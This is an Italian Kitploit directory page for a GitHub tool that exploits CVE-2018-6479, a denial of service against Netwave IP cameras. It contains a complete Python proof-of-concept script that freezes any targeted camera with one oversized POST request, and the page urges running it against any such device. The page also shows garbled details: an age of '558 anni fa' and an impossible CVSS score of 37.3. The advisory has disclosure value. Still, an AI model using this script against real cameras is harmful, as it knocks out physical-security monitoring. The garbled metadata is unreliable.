Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
netwave-dosvulnerability — [CVE-2018-6479] Il server Netwave IP Camera è vulnerabile a Denial of Service tramite un'unica enorme richiesta POST. | Kitploit
Strumenti/GitHubGitHub/dreadlocked/netwave-dosvulnerability
Sicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza Hardware e IoT
GitHubdreadlocked/netwave-dosvulnerability

netwave-dosvulnerability

[CVE-2018-6479] Il server Netwave IP Camera è vulnerabile a Denial of Service tramite un'unica enorme richiesta POST.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
558 anni faNon ancora revisionato

Il server Netwave IP Camera è vulnerabile a una Denial of Service non autenticata tramite un'unica enorme richiesta POST su qualsiasi firmware.

CVEDescrizione
CVE-2018-6479Vulnerabilità di negazione del servizio (Denial of Service) remota non autenticata
CVSSPunteggioDettagli
37.3CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X

0. Introduzione:

Durante una ricerca sulla sicurezza IoT, sono state scoperte alcune vulnerabilità in diversi produttori di IP camera. Netwave IP Camera è un server per IP camera che consente di visualizzare il video della telecamera e di amministrare la telecamera. Le IP camera sono utilizzate soprattutto per la sicurezza fisica e il controllo, quindi la loro disponibilità è cruciale.

1. Negazione del servizio:

Qualsiasi Netwave IP Camera può essere messa fuori uso semplicemente inviando un'enorme richiesta POST al suo percorso root. Una volta inviata la richiesta, il dispositivo si blocca e smette di trasmettere audio e video.

Proof of Concept: esegui il seguente script Python 2.7 contro qualsiasi NetWave IP Camera: smetterà di rispondere e di trasmettere video/audio all'istante.

root@kitploit:~
import string
import httplib
import urllib2

host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body

headers = { 
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}

url = "/"

conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data

2. Ricercatore:

Gonzalo García León

Scarica lo strumento